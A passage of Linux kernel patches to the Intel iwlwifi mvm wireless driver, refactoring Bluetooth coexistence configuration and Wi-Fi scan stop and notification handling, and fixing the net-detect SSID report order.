- enum iwl_umac_scan_uid_type type, bool notify) +static int iwl_umac_scan_stop(struct iwl_mvm *mvm, int type, bool notify) { struct iwl_notification_wait wait_scan_done; static const u8 scan_done_notif[] = { SCAN_COMPLETE_UMAC, }; @@ -1579,7 +1567,7 @@ static int iwl_umac_scan_stop(struct iwl_mvm *mvm, int err; if (iwl_mvm_is_radio_killed(mvm) && - (type & IWL_UMAC_SCAN_UID_REG_SCAN)) { + (type & IWL_MVM_SCAN_REGULAR)) { ieee80211_scan_completed(mvm->hw, true); iwl_mvm_unref(mvm, IWL_MVM_REF_SCAN); break; @@ -1602,9 +1590,9 @@ static int iwl_umac_scan_stop(struct iwl_mvm *mvm, return ret; if (notify) { - if (type & IWL_UMAC_SCAN_UID_SCHED_SCAN) + if (type & IWL_MVM_SCAN_SCHED) ieee80211_sched_scan_stopped(mvm->hw); - if (type & IWL_UMAC_SCAN_UID_REG_SCAN) { + if (type & IWL_MVM_SCAN_REGULAR) { ieee80211_scan_completed(mvm->hw, true); iwl_mvm_unref(mvm, IWL_MVM_REF_SCAN); } @@ -1636,13 +1624,12 @@ void iwl_mvm_report_scan_aborted(struct iwl_mvm *mvm) if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) { u32 uid, i; - uid = iwl_mvm_find_first_scan(mvm, IWL_UMAC_SCAN_UID_REG_SCAN); + uid = iwl_mvm_find_first_scan(mvm, IWL_MVM_SCAN_REGULAR); if (uid < mvm->max_scans) { ieee80211_scan_completed(mvm->hw, true); mvm->scan_uid[uid] = 0; } - uid = iwl_mvm_find_first_scan(mvm, - IWL_UMAC_SCAN_UID_SCHED_SCAN); + uid = iwl_mvm_find_first_scan(mvm, IWL_MVM_SCAN_SCHED); if (uid < mvm->max_scans && !mvm->restart_fw) { ieee80211_sched_scan_stopped(mvm->hw); mvm->scan_uid[uid] = 0; From c3b389d87a0f655d03f9ee00bdacee8e782fbda5 Mon Sep 17 00:00:00 2001 From: Emmanuel Grumbach Date: Sun, 10 May 2015 18:50:37 +0300 Subject: [PATCH 373/872] iwlwifi: mvm: BT Coex - remove useless code Since we don't need to configure the Ack / CTS kill mask anymore in the new API, we don't need to iterate all the interfaces upon rssi event on one of the interfaces. Remove that code. Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/coex.c | 43 ------------------------- 1 file changed, 43 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/coex.c b/drivers/net/wireless/iwlwifi/mvm/coex.c index 13a0a03158de..03dab95ab051 100644 --- a/drivers/net/wireless/iwlwifi/mvm/coex.c +++ b/drivers/net/wireless/iwlwifi/mvm/coex.c @@ -770,49 +770,10 @@ int iwl_mvm_rx_bt_coex_notif(struct iwl_mvm *mvm, return 0; } -static void iwl_mvm_bt_rssi_iterator(void *_data, u8 *mac, - struct ieee80211_vif *vif) -{ - struct iwl_mvm_vif *mvmvif = iwl_mvm_vif_from_mac80211(vif); - struct iwl_bt_iterator_data *data = _data; - struct iwl_mvm *mvm = data->mvm; - - struct ieee80211_sta *sta; - struct iwl_mvm_sta *mvmsta; - - struct ieee80211_chanctx_conf *chanctx_conf; - - rcu_read_lock(); - chanctx_conf = rcu_dereference(vif->chanctx_conf); - /* If channel context is invalid or not on 2.4GHz - don't count it */ - if (!chanctx_conf || - chanctx_conf->def.chan->band != IEEE80211_BAND_2GHZ) { - rcu_read_unlock(); - return; - } - rcu_read_unlock(); - - if (vif->type != NL80211_IFTYPE_STATION || - mvmvif->ap_sta_id == IWL_MVM_STATION_COUNT) - return; - - sta = rcu_dereference_protected(mvm->fw_id_to_mac_id[mvmvif->ap_sta_id], - lockdep_is_held(&mvm->mutex)); - - /* This can happen if the station has been removed right now */ - if (IS_ERR_OR_NULL(sta)) - return; - - mvmsta = iwl_mvm_sta_from_mac80211(sta); -} - void iwl_mvm_bt_rssi_event(struct iwl_mvm *mvm, struct ieee80211_vif *vif, enum ieee80211_rssi_event_data rssi_event) { struct iwl_mvm_vif *mvmvif = iwl_mvm_vif_from_mac80211(vif); - struct iwl_bt_iterator_data data = { - .mvm = mvm, - }; int ret; if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BT_COEX_SPLIT)) { @@ -853,10 +814,6 @@ void iwl_mvm_bt_rssi_event(struct iwl_mvm *mvm, struct ieee80211_vif *vif, if (ret) IWL_ERR(mvm, "couldn't send BT_CONFIG HCMD upon RSSI event\n"); - - ieee80211_iterate_active_interfaces_atomic( - mvm->hw, IEEE80211_IFACE_ITER_NORMAL, - iwl_mvm_bt_rssi_iterator, &data); } #define LINK_QUAL_AGG_TIME_LIMIT_DEF (4000) From 741c4cfbf7705240e905cb4987bf2c23f25de17e Mon Sep 17 00:00:00 2001 From: Emmanuel Grumbach Date: Mon, 11 May 2015 09:05:25 +0300 Subject: [PATCH 374/872] iwlwifi: mvm: BT Coex - allocate a short command on the stack The BT_CONFIG command used to be very long, hence it was allocated on the heap in the previous API. In the new API, this command is much smaller, and can now safely be allocated on the stack. Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/coex.c | 36 ++++++++----------------- 1 file changed, 11 insertions(+), 25 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/coex.c b/drivers/net/wireless/iwlwifi/mvm/coex.c index 03dab95ab051..a9908865b660 100644 --- a/drivers/net/wireless/iwlwifi/mvm/coex.c +++ b/drivers/net/wireless/iwlwifi/mvm/coex.c @@ -6,7 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2013 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -32,7 +32,7 @@ * BSD LICENSE * * Copyright(c) 2013 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -408,23 +408,12 @@ iwl_get_coex_type(struct iwl_mvm *mvm, const struct ieee80211_vif *vif) int iwl_send_bt_init_conf(struct iwl_mvm *mvm) { - struct iwl_bt_coex_cmd *bt_cmd; - struct iwl_host_cmd cmd = { - .id = BT_CONFIG, - .len = { sizeof(*bt_cmd), }, - .dataflags = { IWL_HCMD_DFL_NOCOPY, }, - }; - int ret; + struct iwl_bt_coex_cmd bt_cmd = {}; u32 mode; if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BT_COEX_SPLIT)) return iwl_send_bt_init_conf_old(mvm); - bt_cmd = kzalloc(sizeof(*bt_cmd), GFP_KERNEL); - if (!bt_cmd) - return -ENOMEM; - cmd.data[0] = bt_cmd; - lockdep_assert_held(&mvm->mutex); if (unlikely(mvm->bt_force_ant_mode != BT_FORCE_ANT_DIS)) { @@ -440,36 +429,33 @@ int iwl_send_bt_init_conf(struct iwl_mvm *mvm) mode = 0; } - bt_cmd->mode = cpu_to_le32(mode); + bt_cmd.mode = cpu_to_le32(mode); goto send_cmd; } mode = iwlwifi_mod_params.bt_coex_active ? BT_COEX_NW : BT_COEX_DISABLE; - bt_cmd->mode = cpu_to_le32(mode); + bt_cmd.mode = cpu_to_le32(mode); if (IWL_MVM_BT_COEX_SYNC2SCO) - bt_cmd->enabled_modules |= + bt_cmd.enabled_modules |= cpu_to_le32(BT_COEX_SYNC2SCO_ENABLED); if (iwl_mvm_bt_is_plcr_supported(mvm)) - bt_cmd->enabled_modules |= cpu_to_le32(BT_COEX_CORUN_ENABLED); + bt_cmd.enabled_modules |= cpu_to_le32(BT_COEX_CORUN_ENABLED); if (IWL_MVM_BT_COEX_MPLUT) { - bt_cmd->enabled_modules |= cpu_to_le32(BT_COEX_MPLUT_ENABLED); - bt_cmd->enabled_modules |= + bt_cmd.enabled_modules |= cpu_to_le32(BT_COEX_MPLUT_ENABLED); + bt_cmd.enabled_modules |= cpu_to_le32(BT_COEX_MPLUT_BOOST_ENABLED); } - bt_cmd->enabled_modules |= cpu_to_le32(BT_COEX_HIGH_BAND_RET); + bt_cmd.enabled_modules |= cpu_to_le32(BT_COEX_HIGH_BAND_RET); send_cmd: memset(&mvm->last_bt_notif, 0, sizeof(mvm->last_bt_notif)); memset(&mvm->last_bt_ci_cmd, 0, sizeof(mvm->last_bt_ci_cmd)); - ret = iwl_mvm_send_cmd(mvm, &cmd); - - kfree(bt_cmd); - return ret; + return iwl_mvm_send_cmd_pdu(mvm, BT_CONFIG, 0, sizeof(bt_cmd), &bt_cmd); } static int iwl_mvm_bt_coex_reduced_txp(struct iwl_mvm *mvm, u8 sta_id, From 1fa1bcc02c158bc8a802907cc01dfa33663ec16c Mon Sep 17 00:00:00 2001 From: Avraham Stern Date: Tue, 31 Mar 2015 16:22:33 +0300 Subject: [PATCH 375/872] iwlwifi: mvm: print scanned channel list on scan iteration complete notification When receiving scan iteration complete notification, print a list of the channels that have been scanned in this iteration. This is useful for debugging. Signed-off-by: Avraham Stern Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/scan.c | 23 +++++++++++++++++++++-- 1 file changed, 21 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index 7777d56cbb60..e859584f0f35 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -312,16 +312,35 @@ int iwl_mvm_max_scan_ie_len(struct iwl_mvm *mvm) return max_ie_len; } +static u8 *iwl_mvm_dump_channel_list(struct iwl_scan_results_notif *res, + int num_res, u8 *buf, size_t buf_size) +{ + int i; + u8 *pos = buf, *end = buf + buf_size; + + for (i = 0; pos < end && i < num_res; i++) + pos += snprintf(pos, end - pos, " %u", res[i].channel); + + /* terminate the string in case the buffer was too short */ + *(buf + buf_size - 1) = '\0'; + + return buf; +} + int iwl_mvm_rx_scan_offload_iter_complete_notif(struct iwl_mvm *mvm, struct iwl_rx_cmd_buffer *rxb, struct iwl_device_cmd *cmd) { struct iwl_rx_packet *pkt = rxb_addr(rxb); struct iwl_lmac_scan_complete_notif *notif = (void *)pkt->data; + u8 buf[256]; IWL_DEBUG_SCAN(mvm, - "Scan offload iteration complete: status=0x%x scanned channels=%d\n", - notif->status, notif->scanned_channels); + "Scan offload iteration complete: status=0x%x scanned channels=%d channels list: %s\n", + notif->status, notif->scanned_channels, + iwl_mvm_dump_channel_list(notif->results, + notif->scanned_channels, buf, + sizeof(buf))); return 0; } From ee9219b2c268b228c0494c98259401e665457b87 Mon Sep 17 00:00:00 2001 From: Avraham Stern Date: Mon, 23 Mar 2015 15:09:27 +0200 Subject: [PATCH 376/872] iwlwifi: mvm: add UMAC scan iteration complete notification Add UMAC scan iteration complete notification. This notification can be enabled by setting scan_iter_notif_enabled through debugfs. Upon receiving this notification, print the list of channels that have been scanned in this iteration. This is useful for debugging. Signed-off-by: Avraham Stern Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- .../net/wireless/iwlwifi/mvm/fw-api-scan.h | 23 +++++++++++++++++++ drivers/net/wireless/iwlwifi/mvm/fw-api.h | 5 ++-- drivers/net/wireless/iwlwifi/mvm/mvm.h | 3 +++ drivers/net/wireless/iwlwifi/mvm/ops.c | 3 +++ drivers/net/wireless/iwlwifi/mvm/scan.c | 21 +++++++++++++++++ 5 files changed, 53 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/fw-api-scan.h b/drivers/net/wireless/iwlwifi/mvm/fw-api-scan.h index be1a0a127077..022869323ca9 100644 --- a/drivers/net/wireless/iwlwifi/mvm/fw-api-scan.h +++ b/drivers/net/wireless/iwlwifi/mvm/fw-api-scan.h @@ -837,4 +837,27 @@ struct iwl_scan_offload_profiles_query { struct iwl_scan_offload_profile_match matches[IWL_SCAN_MAX_PROFILES]; } __packed; /* SCAN_OFFLOAD_PROFILES_QUERY_RSP_S_VER_2 */ +/** + * struct iwl_umac_scan_iter_complete_notif - notifies end of scanning iteration + * @uid: scan id, &enum iwl_umac_scan_uid_offsets + * @scanned_channels: number of channels scanned and number of valid elements in + * results array + * @status: one of SCAN_COMP_STATUS_* + * @bt_status: BT on/off status + * @last_channel: last channel that was scanned + * @tsf_low: TSF timer (lower half) in usecs + * @tsf_high: TSF timer (higher half) in usecs + * @results: array of scan results, only "scanned_channels" of them are valid + */ +struct iwl_umac_scan_iter_complete_notif { + __le32 uid; + u8 scanned_channels; + u8 status; + u8 bt_status; + u8 last_channel; + __le32 tsf_low; + __le32 tsf_high; + struct iwl_scan_results_notif results[]; +} __packed; /* SCAN_ITER_COMPLETE_NTF_UMAC_API_S_VER_1 */ + #endif diff --git a/drivers/net/wireless/iwlwifi/mvm/fw-api.h b/drivers/net/wireless/iwlwifi/mvm/fw-api.h index 56db2ba52da0..0ed7675eff31 100644 --- a/drivers/net/wireless/iwlwifi/mvm/fw-api.h +++ b/drivers/net/wireless/iwlwifi/mvm/fw-api.h @@ -6,7 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2012 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -32,7 +32,7 @@ * BSD LICENSE * * Copyright(c) 2012 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -108,6 +108,7 @@ enum { ANTENNA_COUPLING_NOTIFICATION = 0xa, /* UMAC scan commands */ + SCAN_ITERATION_COMPLETE_UMAC = 0xb5, SCAN_CFG_CMD = 0xc, SCAN_REQ_UMAC = 0xd, SCAN_ABORT_UMAC = 0xe, diff --git a/drivers/net/wireless/iwlwifi/mvm/mvm.h b/drivers/net/wireless/iwlwifi/mvm/mvm.h index dde83efd1a6c..d4e0cabba23c 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mvm.h +++ b/drivers/net/wireless/iwlwifi/mvm/mvm.h @@ -1150,6 +1150,9 @@ int iwl_mvm_config_scan(struct iwl_mvm *mvm); int iwl_mvm_rx_umac_scan_complete_notif(struct iwl_mvm *mvm, struct iwl_rx_cmd_buffer *rxb, struct iwl_device_cmd *cmd); +int iwl_mvm_rx_umac_scan_iter_complete_notif(struct iwl_mvm *mvm, + struct iwl_rx_cmd_buffer *rxb, + struct iwl_device_cmd *cmd); /* MVM debugfs */ #ifdef CONFIG_IWLWIFI_DEBUGFS diff --git a/drivers/net/wireless/iwlwifi/mvm/ops.c b/drivers/net/wireless/iwlwifi/mvm/ops.c index 534a9fd8fcbd..4935caf6543f 100644 --- a/drivers/net/wireless/iwlwifi/mvm/ops.c +++ b/drivers/net/wireless/iwlwifi/mvm/ops.c @@ -245,6 +245,8 @@ static const struct iwl_rx_handlers iwl_mvm_rx_handlers[] = { false), RX_HANDLER(SCAN_COMPLETE_UMAC, iwl_mvm_rx_umac_scan_complete_notif, true), + RX_HANDLER(SCAN_ITERATION_COMPLETE_UMAC, + iwl_mvm_rx_umac_scan_iter_complete_notif, false), RX_HANDLER(CARD_STATE_NOTIFICATION, iwl_mvm_rx_card_state_notif, false), @@ -356,6 +358,7 @@ static const char *const iwl_mvm_cmd_strings[REPLY_MAX] = { CMD(TDLS_CHANNEL_SWITCH_NOTIFICATION), CMD(TDLS_CONFIG_CMD), CMD(MCC_UPDATE_CMD), + CMD(SCAN_ITERATION_COMPLETE_UMAC), }; #undef CMD diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index e859584f0f35..81ea9f46365f 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -1181,6 +1181,10 @@ static u32 iwl_mvm_scan_umac_flags(struct iwl_mvm *mvm, if (iwl_mvm_scan_total_iterations(params) > 1) flags |= IWL_UMAC_SCAN_GEN_FLAGS_PERIODIC; +#ifdef CONFIG_IWLWIFI_DEBUGFS + if (mvm->scan_iter_notif_enabled) + flags |= IWL_UMAC_SCAN_GEN_FLAGS_ITER_COMPLETE; +#endif return flags; } @@ -1522,6 +1526,23 @@ int iwl_mvm_rx_umac_scan_complete_notif(struct iwl_mvm *mvm, return 0; } +int iwl_mvm_rx_umac_scan_iter_complete_notif(struct iwl_mvm *mvm, + struct iwl_rx_cmd_buffer *rxb, + struct iwl_device_cmd *cmd) +{ + struct iwl_rx_packet *pkt = rxb_addr(rxb); + struct iwl_umac_scan_iter_complete_notif *notif = (void *)pkt->data; + u8 buf[256]; + + IWL_DEBUG_SCAN(mvm, + "UMAC Scan iteration complete: status=0x%x scanned_channels=%d channels list: %s\n", + notif->status, notif->scanned_channels, + iwl_mvm_dump_channel_list(notif->results, + notif->scanned_channels, buf, + sizeof(buf))); + return 0; +} + static bool iwl_scan_umac_done_check(struct iwl_notif_wait_data *notif_wait, struct iwl_rx_packet *pkt, void *data) { From ae90c2e5784b465d903106d833afab4f3e139d80 Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Wed, 6 May 2015 10:45:42 +0300 Subject: [PATCH 377/872] iwlwifi: mvm: fix the net-detect SSIDs report order After the scan refactor, the order of the SSIDs passed to the firmware in all scans (including net-detect) are inverted. This was causing the reporting code to use the wrong SSIDs. To fix this, invert the array index when accessing the saved match SSIDs to report the wake-up. Signed-off-by: Luciano Coelho Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/d3.c | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/d3.c b/drivers/net/wireless/iwlwifi/mvm/d3.c index d30f168dcafe..408b0ce42dde 100644 --- a/drivers/net/wireless/iwlwifi/mvm/d3.c +++ b/drivers/net/wireless/iwlwifi/mvm/d3.c @@ -1785,7 +1785,7 @@ static void iwl_mvm_query_netdetect_reasons(struct iwl_mvm *mvm, for_each_set_bit(i, &matched_profiles, mvm->n_nd_match_sets) { struct iwl_scan_offload_profile_match *fw_match; struct cfg80211_wowlan_nd_match *match; - int n_channels = 0; + int idx, n_channels = 0; fw_match = &query.matches[i]; @@ -1800,8 +1800,12 @@ static void iwl_mvm_query_netdetect_reasons(struct iwl_mvm *mvm, net_detect->matches[net_detect->n_matches++] = match; - match->ssid.ssid_len = mvm->nd_match_sets[i].ssid.ssid_len; - memcpy(match->ssid.ssid, mvm->nd_match_sets[i].ssid.ssid, + /* We inverted the order of the SSIDs in the scan + * request, so invert the index here. + */ + idx = mvm->n_nd_match_sets - i - 1; + match->ssid.ssid_len = mvm->nd_match_sets[idx].ssid.ssid_len; + memcpy(match->ssid.ssid, mvm->nd_match_sets[idx].ssid.ssid, match->ssid.ssid_len); if (mvm->n_nd_channels < n_channels) From 416c9b50647bc8ac22cb16e3062076f68dafebfe Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Tue, 5 May 2015 11:32:29 +0300 Subject: [PATCH 378/872] iwlwifi: mvm: make iwl_mvm_config_sched_scan_profiles() static The iwl_mvm_config_sched_scan_profiles() function is only used in scan.c, so remove the declaration from mvm.h and make it static. Signed-off-by: Luciano Coelho Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/mvm.h | 2 -- drivers/net/wireless/iwlwifi/mvm/scan.c | 5 +++-- 2 files changed, 3 insertions(+), 4 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/mvm.h b/drivers/net/wireless/iwlwifi/mvm/mvm.h index d4e0cabba23c..46668ef2df91 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mvm.h +++ b/drivers/net/wireless/iwlwifi/mvm/mvm.h @@ -1133,8 +1133,6 @@ int iwl_mvm_rx_scan_offload_complete_notif(struct iwl_mvm *mvm, int iwl_mvm_rx_scan_offload_iter_complete_notif(struct iwl_mvm *mvm, struct iwl_rx_cmd_buffer *rxb, struct iwl_device_cmd *cmd); -int iwl_mvm_config_sched_scan_profiles(struct iwl_mvm *mvm, - struct cfg80211_sched_scan_request *req); int iwl_mvm_sched_scan_start(struct iwl_mvm *mvm, struct ieee80211_vif *vif, struct cfg80211_sched_scan_request *req, diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index 81ea9f46365f..443562c4ca3e 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -476,8 +476,9 @@ static void iwl_scan_build_ssids(struct iwl_mvm_scan_params *params, } } -int iwl_mvm_config_sched_scan_profiles(struct iwl_mvm *mvm, - struct cfg80211_sched_scan_request *req) +static int +iwl_mvm_config_sched_scan_profiles(struct iwl_mvm *mvm, + struct cfg80211_sched_scan_request *req) { struct iwl_scan_offload_profile *profile; struct iwl_scan_offload_profile_cfg *profile_cfg; From cb97e415737f524b73b4e0c4475182b313c83bd8 Mon Sep 17 00:00:00 2001 From: Emmanuel Grumbach Date: Sat, 16 May 2015 22:47:56 +0300 Subject: [PATCH 379/872] iwlwifi: mvm: BT Coex - fix shared antenna check with new API The commit below fixed this for the old firmware API only. Since the new firmware API hasn't been released yet, this doesn't fix anything on currently existing firmwares. This completes: commit afcee962b09842d0f4191beb4a2d08251b4c7705 Author: Eyal Shapira Date: Mon Feb 9 15:18:17 2015 +0200 iwlwifi: mvm: fix BT coex shared antenna activity check type=bugfix bug=not-tracked fixes=unknown Reviewed-by: Eyal Shapira Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/coex.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/coex.c b/drivers/net/wireless/iwlwifi/mvm/coex.c index a9908865b660..662fa9c09624 100644 --- a/drivers/net/wireless/iwlwifi/mvm/coex.c +++ b/drivers/net/wireless/iwlwifi/mvm/coex.c @@ -886,7 +886,7 @@ bool iwl_mvm_bt_coex_is_shared_ant_avail(struct iwl_mvm *mvm) if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BT_COEX_SPLIT)) return iwl_mvm_bt_coex_is_shared_ant_avail_old(mvm); - return le32_to_cpu(mvm->last_bt_notif.bt_activity_grading) == BT_OFF; + return le32_to_cpu(mvm->last_bt_notif.bt_activity_grading) < BT_HIGH_TRAFFIC; } bool iwl_mvm_bt_coex_is_tpc_allowed(struct iwl_mvm *mvm, From 62a6b9c8c9483205124f52e35dd5af43eebe3a16 Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Tue, 21 Apr 2015 13:34:10 +0300 Subject: [PATCH 380/872] iwlwifi: mvm: reorganize scan stopping functions The iwl_mvm_scan_offload_stop() function is used to stop LMAC regular scan, stop LMAC scheduled scan and stop UMAC scheduled scans (but not UMAC regular scans), making it very difficult to read. Reorganize the scan stopping functions by creating separate functions to stop regular and scheduled scans, separating the LMAC stopping part of the code from the rest and renaming the offload_stop function to iwl_mvm_lmac_scan_stop(). Signed-off-by: Luciano Coelho Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/d3.c | 2 +- drivers/net/wireless/iwlwifi/mvm/mac80211.c | 10 +- drivers/net/wireless/iwlwifi/mvm/mvm.h | 4 +- drivers/net/wireless/iwlwifi/mvm/scan.c | 101 ++++++++++---------- 4 files changed, 59 insertions(+), 58 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/d3.c b/drivers/net/wireless/iwlwifi/mvm/d3.c index 408b0ce42dde..ceffc78ff15b 100644 --- a/drivers/net/wireless/iwlwifi/mvm/d3.c +++ b/drivers/net/wireless/iwlwifi/mvm/d3.c @@ -761,7 +761,7 @@ void iwl_mvm_set_last_nonqos_seq(struct iwl_mvm *mvm, struct ieee80211_vif *vif) static int iwl_mvm_switch_to_d3(struct iwl_mvm *mvm) { - iwl_mvm_cancel_scan(mvm); + iwl_mvm_reg_scan_stop(mvm); iwl_trans_stop_device(mvm->trans); diff --git a/drivers/net/wireless/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/iwlwifi/mvm/mac80211.c index d13138e51686..13469315ed33 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mac80211.c +++ b/drivers/net/wireless/iwlwifi/mvm/mac80211.c @@ -2360,8 +2360,10 @@ static void iwl_mvm_bss_info_changed(struct ieee80211_hw *hw, mutex_lock(&mvm->mutex); - if (changes & BSS_CHANGED_IDLE && !bss_conf->idle) - iwl_mvm_scan_offload_stop(mvm, true); + if (changes & BSS_CHANGED_IDLE && !bss_conf->idle) { + iwl_mvm_sched_scan_stop(mvm, true); + iwl_mvm_reg_scan_stop(mvm); + } switch (vif->type) { case NL80211_IFTYPE_STATION: @@ -2417,7 +2419,7 @@ static void iwl_mvm_mac_cancel_hw_scan(struct ieee80211_hw *hw, */ if ((mvm->scan_status & IWL_MVM_SCAN_REGULAR) || (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN)) - iwl_mvm_cancel_scan(mvm); + iwl_mvm_reg_scan_stop(mvm); mutex_unlock(&mvm->mutex); } @@ -2775,7 +2777,7 @@ static int iwl_mvm_mac_sched_scan_stop(struct ieee80211_hw *hw, return 0; } - ret = iwl_mvm_scan_offload_stop(mvm, false); + ret = iwl_mvm_sched_scan_stop(mvm, false); mutex_unlock(&mvm->mutex); iwl_mvm_wait_for_async_handlers(mvm); diff --git a/drivers/net/wireless/iwlwifi/mvm/mvm.h b/drivers/net/wireless/iwlwifi/mvm/mvm.h index 46668ef2df91..71b776358dc0 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mvm.h +++ b/drivers/net/wireless/iwlwifi/mvm/mvm.h @@ -1122,7 +1122,7 @@ int iwl_mvm_reg_scan_start(struct iwl_mvm *mvm, struct ieee80211_vif *vif, struct cfg80211_scan_request *req, struct ieee80211_scan_ies *ies); int iwl_mvm_scan_size(struct iwl_mvm *mvm); -int iwl_mvm_cancel_scan(struct iwl_mvm *mvm); +int iwl_mvm_reg_scan_stop(struct iwl_mvm *mvm); int iwl_mvm_max_scan_ie_len(struct iwl_mvm *mvm); void iwl_mvm_report_scan_aborted(struct iwl_mvm *mvm); @@ -1138,7 +1138,7 @@ int iwl_mvm_sched_scan_start(struct iwl_mvm *mvm, struct cfg80211_sched_scan_request *req, struct ieee80211_scan_ies *ies, int type); -int iwl_mvm_scan_offload_stop(struct iwl_mvm *mvm, bool notify); +int iwl_mvm_sched_scan_stop(struct iwl_mvm *mvm, bool notify); int iwl_mvm_rx_scan_offload_results(struct iwl_mvm *mvm, struct iwl_rx_cmd_buffer *rxb, struct iwl_device_cmd *cmd); diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index 443562c4ca3e..579b36b0fecb 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -567,12 +567,6 @@ static int iwl_mvm_send_scan_offload_abort(struct iwl_mvm *mvm) }; u32 status; - /* Exit instantly with error when device is not ready - * to receive scan abort command or it does not perform - * scheduled scan currently */ - if (!mvm->scan_status) - return -EIO; - ret = iwl_mvm_send_cmd_status(mvm, &cmd, &status); if (ret) return ret; @@ -592,30 +586,15 @@ static int iwl_mvm_send_scan_offload_abort(struct iwl_mvm *mvm) return ret; } -int iwl_mvm_scan_offload_stop(struct iwl_mvm *mvm, bool notify) +static int iwl_mvm_lmac_scan_stop(struct iwl_mvm *mvm, int type) { int ret; struct iwl_notification_wait wait_scan_done; static const u8 scan_done_notif[] = { SCAN_OFFLOAD_COMPLETE, }; - bool sched = !!(mvm->scan_status & IWL_MVM_SCAN_SCHED); + bool sched = type & IWL_MVM_SCAN_SCHED; lockdep_assert_held(&mvm->mutex); - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) - return iwl_umac_scan_stop(mvm, IWL_MVM_SCAN_SCHED, notify); - - /* FIXME: For now we only check if no scan is set here, since - * we only support LMAC in this flow and it doesn't support - * multiple scans. - */ - if (!mvm->scan_status) - return 0; - - if (iwl_mvm_is_radio_killed(mvm)) { - ret = 0; - goto out; - } - iwl_init_notification_wait(&mvm->notif_wait, &wait_scan_done, scan_done_notif, ARRAY_SIZE(scan_done_notif), @@ -634,27 +613,6 @@ int iwl_mvm_scan_offload_stop(struct iwl_mvm *mvm, bool notify) ret = iwl_wait_notification(&mvm->notif_wait, &wait_scan_done, 1 * HZ); out: - /* Clear the scan status so the next scan requests will - * succeed and mark the scan as stopping, so that the Rx - * handler doesn't do anything, as the scan was stopped from - * above. Since the rx handler won't do anything now, we have - * to release the scan reference here. - */ - if (mvm->scan_status == IWL_MVM_SCAN_REGULAR) - iwl_mvm_unref(mvm, IWL_MVM_REF_SCAN); - - if (sched) { - mvm->scan_status &= ~IWL_MVM_SCAN_SCHED; - mvm->scan_status |= IWL_MVM_SCAN_STOPPING_SCHED; - if (notify) - ieee80211_sched_scan_stopped(mvm->hw); - } else { - mvm->scan_status &= ~IWL_MVM_SCAN_REGULAR; - mvm->scan_status |= IWL_MVM_SCAN_STOPPING_REGULAR; - if (notify) - ieee80211_scan_completed(mvm->hw, true); - } - return ret; } @@ -927,8 +885,10 @@ static int 